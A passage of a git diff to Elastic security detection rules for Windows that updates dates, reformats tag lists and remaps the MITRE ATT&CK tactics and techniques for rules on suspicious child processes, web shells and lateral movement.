Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Initial Access", "Data Source: Elastic Endgame", "Use Case: Vulnerability", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -122,26 +107,13 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1190" name = "Exploit Public-Facing Application" reference = "https://attack.mitre.org/techniques/T1190/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1210" -name = "Exploitation of Remote Services" -reference = "https://attack.mitre.org/techniques/T1210/" - - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/windows/initial_access_suspicious_ms_exchange_worker_child_process.toml b/rules/windows/initial_access_suspicious_ms_exchange_worker_child_process.toml index 28e435a3737..fbd7ead64d2 100644 --- a/rules/windows/initial_access_suspicious_ms_exchange_worker_child_process.toml +++ b/rules/windows/initial_access_suspicious_ms_exchange_worker_child_process.toml @@ -2,7 +2,7 @@ creation_date = "2021/03/08" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/09/12" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -66,19 +66,7 @@ references = [ risk_score = 73 rule_id = "f81ee52c-297e-46d9-9205-07e66931df26" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Initial Access", - "Tactic: Execution", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Initial Access", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -94,22 +82,12 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1190" -name = "Exploit Public-Facing Application" -reference = "https://attack.mitre.org/techniques/T1190/" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" @@ -120,10 +98,38 @@ id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1505" +name = "Server Software Component" +reference = "https://attack.mitre.org/techniques/T1505/" + +[[rule.threat.technique.subtechnique]] +id = "T1505.003" +name = "Web Shell" +reference = "https://attack.mitre.org/techniques/T1505/003/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/windows/initial_access_suspicious_ms_office_child_process.toml b/rules/windows/initial_access_suspicious_ms_office_child_process.toml index 74d8fad8028..f44626289f7 100644 --- a/rules/windows/initial_access_suspicious_ms_office_child_process.toml +++ b/rules/windows/initial_access_suspicious_ms_office_child_process.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -77,22 +77,7 @@ references = ["https://www.elastic.co/blog/vulnerability-summary-follina"] risk_score = 47 rule_id = "a624863f-a70d-417f-a7d2-7a404638d47f" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Initial Access", - "Tactic: Defense Evasion", - "Tactic: Execution", - "Resources: Investigation Guide", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike"] timestamp_override = "event.ingested" type = "eql" @@ -123,27 +108,25 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1566" -name = "Phishing" -reference = "https://attack.mitre.org/techniques/T1566/" -[[rule.threat.technique.subtechnique]] -id = "T1566.001" -name = "Spearphishing Attachment" -reference = "https://attack.mitre.org/techniques/T1566/001/" - +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" @@ -154,22 +137,27 @@ id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" +[[rule.threat.technique.subtechnique]] +id = "T1059.005" +name = "Visual Basic" +reference = "https://attack.mitre.org/techniques/T1059/005/" +[[rule.threat.technique]] +id = "T1203" +name = "Exploitation for Client Execution" +reference = "https://attack.mitre.org/techniques/T1203/" -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1218" -name = "System Binary Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1218/" +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/initial_access_suspicious_ms_outlook_child_process.toml b/rules/windows/initial_access_suspicious_ms_outlook_child_process.toml index c0828b44e66..c00264926f5 100644 --- a/rules/windows/initial_access_suspicious_ms_outlook_child_process.toml +++ b/rules/windows/initial_access_suspicious_ms_outlook_child_process.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "system", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -75,22 +75,7 @@ This rule looks for suspicious processes spawned by MS Outlook, which can be the risk_score = 21 rule_id = "32f4675e-6c49-4ace-80f9-97c9259dca2e" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Initial Access", - "Tactic: Defense Evasion", - "Tactic: Execution", - "Resources: Investigation Guide", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: SentinelOne", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Windows Security Event Logs", - "Data Source: Crowdstrike", - "Data Source: Sysmon", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Initial Access", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Data Source: Windows Security Event Logs", "Data Source: Crowdstrike", "Data Source: Sysmon"] timestamp_override = "event.ingested" type = "eql" @@ -110,53 +95,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1566" -name = "Phishing" -reference = "https://attack.mitre.org/techniques/T1566/" -[[rule.threat.technique.subtechnique]] -id = "T1566.001" -name = "Spearphishing Attachment" -reference = "https://attack.mitre.org/techniques/T1566/001/" - - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" [[rule.threat.technique.subtechnique]] -id = "T1059.003" -name = "Windows Command Shell" -reference = "https://attack.mitre.org/techniques/T1059/003/" - - +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1218" -name = "System Binary Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1218/" +id = "T1566" +name = "Phishing" +reference = "https://attack.mitre.org/techniques/T1566/" +[[rule.threat.technique.subtechnique]] +id = "T1566.001" +name = "Spearphishing Attachment" +reference = "https://attack.mitre.org/techniques/T1566/001/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/windows/initial_access_suspicious_windows_server_update_svc.toml b/rules/windows/initial_access_suspicious_windows_server_update_svc.toml index c1bfe3cbe84..d60b1c1c4fa 100644 --- a/rules/windows/initial_access_suspicious_windows_server_update_svc.toml +++ b/rules/windows/initial_access_suspicious_windows_server_update_svc.toml @@ -2,7 +2,7 @@ creation_date = "2025/10/24" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/10/24" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -58,19 +58,7 @@ references = [ risk_score = 73 rule_id = "1ac027c2-8c60-4715-af73-927b9c219e20" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Initial Access", - "Tactic: Execution", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -86,22 +74,30 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1190" -name = "Exploit Public-Facing Application" -reference = "https://attack.mitre.org/techniques/T1190/" +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" +[[rule.threat.technique.subtechnique]] +id = "T1218.011" +name = "Rundll32" +reference = "https://attack.mitre.org/techniques/T1218/011/" [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" @@ -112,10 +108,7 @@ id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/initial_access_url_cve_2025_33053.toml b/rules/windows/initial_access_url_cve_2025_33053.toml index 17c356f8d2c..2f44d1c7787 100644 --- a/rules/windows/initial_access_url_cve_2025_33053.toml +++ b/rules/windows/initial_access_url_cve_2025_33053.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/11" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/06/11" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -52,19 +52,7 @@ references = [ risk_score = 73 rule_id = "5e23495f-09e2-4484-8235-bdb150d698c9" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Initial Access", - "Tactic: Defense Evasion", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -84,37 +72,31 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1566" -name = "Phishing" -reference = "https://attack.mitre.org/techniques/T1566/" -[[rule.threat.technique.subtechnique]] -id = "T1566.001" -name = "Spearphishing Attachment" -reference = "https://attack.mitre.org/techniques/T1566/001/" +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" [[rule.threat.technique.subtechnique]] -id = "T1566.002" -name = "Spearphishing Link" -reference = "https://attack.mitre.org/techniques/T1566/002/" +id = "T1574.008" +name = "Path Interception by Search Order Hijacking" +reference = "https://attack.mitre.org/techniques/T1574/008/" [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - - - +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1218" -name = "System Binary Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1218/" +[[rule.threat.technique]] +id = "T1203" +name = "Exploitation for Client Execution" +reference = "https://attack.mitre.org/techniques/T1203/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/initial_access_via_explorer_suspicious_child_parent_args.toml b/rules/windows/initial_access_via_explorer_suspicious_child_parent_args.toml index 7a7e8c67522..f5e2aeffe12 100644 --- a/rules/windows/initial_access_via_explorer_suspicious_child_parent_args.toml +++ b/rules/windows/initial_access_via_explorer_suspicious_child_parent_args.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/29" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -60,20 +60,7 @@ Windows Explorer, a core component of the Windows OS, manages file and folder na risk_score = 47 rule_id = "9a5b4e31-6cde-4295-9ff7-6be1b8567e1b" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Initial Access", - "Tactic: Defense Evasion", - "Tactic: Execution", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Lateral Movement", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -96,63 +83,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1566" -name = "Phishing" -reference = "https://attack.mitre.org/techniques/T1566/" -[[rule.threat.technique.subtechnique]] -id = "T1566.001" -name = "Spearphishing Attachment" -reference = "https://attack.mitre.org/techniques/T1566/001/" - -[[rule.threat.technique.subtechnique]] -id = "T1566.002" -name = "Spearphishing Link" -reference = "https://attack.mitre.org/techniques/T1566/002/" - - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.003" -name = "Windows Command Shell" -reference = "https://attack.mitre.org/techniques/T1059/003/" +id = "T1559" +name = "Inter-Process Communication" +reference = "https://attack.mitre.org/techniques/T1559/" [[rule.threat.technique.subtechnique]] -id = "T1059.005" -name = "Visual Basic" -reference = "https://attack.mitre.org/techniques/T1059/005/" - - +id = "T1559.001" +name = "Component Object Model" +reference = "https://attack.mitre.org/techniques/T1559/001/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1218" -name = "System Binary Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1218/" +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" +[[rule.threat.technique.subtechnique]] +id = "T1021.003" +name = "Distributed Component Object Model" +reference = "https://attack.mitre.org/techniques/T1021/003/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/windows/initial_access_webshell_screenconnect_server.toml b/rules/windows/initial_access_webshell_screenconnect_server.toml index fbe76f594f5..1b5936dcd82 100644 --- a/rules/windows/initial_access_webshell_screenconnect_server.toml +++ b/rules/windows/initial_access_webshell_screenconnect_server.toml @@ -2,7 +2,7 @@ creation_date = "2024/03/26" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/09/12" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -92,22 +92,12 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1190" -name = "Exploit Public-Facing Application" -reference = "https://attack.mitre.org/techniques/T1190/" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" @@ -118,10 +108,20 @@ id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/windows/initial_access_xsl_script_execution_via_com.toml b/rules/windows/initial_access_xsl_script_execution_via_com.toml index 2a1b8903abd..9b08ea6268f 100644 --- a/rules/windows/initial_access_xsl_script_execution_via_com.toml +++ b/rules/windows/initial_access_xsl_script_execution_via_com.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/27" integration = ["endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -18,15 +18,7 @@ name = "Remote XSL Script Execution via COM" risk_score = 21 rule_id = "48f657ee-de4f-477c-aa99-ed88ee7af97a" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Initial Access", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"] type = "eql" query = ''' @@ -82,31 +74,31 @@ The Microsoft.XMLDOM COM interface allows applications to parse and transform XM [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1566" -name = "Phishing" -reference = "https://attack.mitre.org/techniques/T1566/" -[[rule.threat.technique.subtechnique]] -id = "T1566.002" -name = "Spearphishing Link" -reference = "https://attack.mitre.org/techniques/T1566/002/" - - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1220" name = "XSL Script Processing" reference = "https://attack.mitre.org/techniques/T1220/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1559" +name = "Inter-Process Communication" +reference = "https://attack.mitre.org/techniques/T1559/" + +[[rule.threat.technique.subtechnique]] +id = "T1559.001" +name = "Component Object Model" +reference = "https://attack.mitre.org/techniques/T1559/001/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/lateral_movement_alternate_creds_pth.toml b/rules/windows/lateral_movement_alternate_creds_pth.toml index 1e5bd39b62b..7ea89b9a9da 100644 --- a/rules/windows/lateral_movement_alternate_creds_pth.toml +++ b/rules/windows/lateral_movement_alternate_creds_pth.toml @@ -2,7 +2,7 @@ creation_date = "2023/03/29" integration = ["windows", "system"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -55,14 +55,7 @@ references = ["https://attack.mitre.org/techniques/T1550/002/"] risk_score = 47 rule_id = "daafdf96-e7b1-4f14-b494-27e0d24b11f6" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Lateral Movement", - "Data Source: Windows Security Event Logs", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Lateral Movement", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" @@ -76,22 +69,39 @@ user.id : (S-1-5-21-* or S-1-12-1-*) and winlog.event_data.LogonProcessName : "s [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1550" name = "Use Alternate Authentication Material" reference = "https://attack.mitre.org/techniques/T1550/" + [[rule.threat.technique.subtechnique]] id = "T1550.002" name = "Pass the Hash" reference = "https://attack.mitre.org/techniques/T1550/002/" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" +[[rule.threat.technique.subtechnique]] +id = "T1550.002" +name = "Pass the Hash" +reference = "https://attack.mitre.org/techniques/T1550/002/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - [rule.new_terms] field = "new_terms_fields" value = ["user.id"] diff --git a/rules/windows/lateral_movement_cmd_service.toml b/rules/windows/lateral_movement_cmd_service.toml index 3e17c1558a3..580a36e40c5 100644 --- a/rules/windows/lateral_movement_cmd_service.toml +++ b/rules/windows/lateral_movement_cmd_service.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/02" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -57,15 +57,7 @@ The Service Control Manager in Windows allows for the management of services, wh risk_score = 21 rule_id = "d61cbcf8-1bc1-4cff-85ba-e7b21c5beedc" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Lateral Movement", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Lateral Movement", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: Sysmon", "Resources: Investigation Guide"] type = "eql" query = ''' @@ -80,48 +72,49 @@ sequence by process.entity_id with maxspan = 1m [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1569" +name = "System Services" +reference = "https://attack.mitre.org/techniques/T1569/" + +[[rule.threat.technique.subtechnique]] +id = "T1569.002" +name = "Service Execution" +reference = "https://attack.mitre.org/techniques/T1569/002/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1569" -name = "System Services" -reference = "https://attack.mitre.org/techniques/T1569/" -[[rule.threat.technique.subtechnique]] -id = "T1569.002" -name = "Service Execution" -reference = "https://attack.mitre.org/techniques/T1569/002/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/lateral_movement_credential_access_kerberos_correlation.toml b/rules/windows/lateral_movement_credential_access_kerberos_correlation.toml index ecce43b56cd..698eebfb106 100644 --- a/rules/windows/lateral_movement_credential_access_kerberos_correlation.toml +++ b/rules/windows/lateral_movement_credential_access_kerberos_correlation.toml @@ -2,7 +2,7 @@ creation_date = "2025/10/28" integration = ["endpoint", "windows", "system"] maturity = "production" -updated_date = "2025/12/12" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -64,20 +64,7 @@ references = [ risk_score = 73 rule_id = "c6b40f4c-c6a9-434e-adb8-989b0d06d005" severity = "high" -tags = [ - "Domain: Endpoint", - "Domain: Identity", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Tactic: Lateral Movement", - "Use Case: Active Directory Monitoring", - "Data Source: Active Directory", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Windows Security Event Logs", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "Domain: Identity", "OS: Windows", "Use Case: Threat Detection", "Use Case: Active Directory Monitoring", "Tactic: Credential Access", "Data Source: Active Directory", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -99,33 +86,11 @@ sequence by source.port, source.ip with maxspan=3s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1550" -name = "Use Alternate Authentication Material" -reference = "https://attack.mitre.org/techniques/T1550/" -[[rule.threat.technique.subtechnique]] -id = "T1550.003" -name = "Pass the Ticket" -reference = 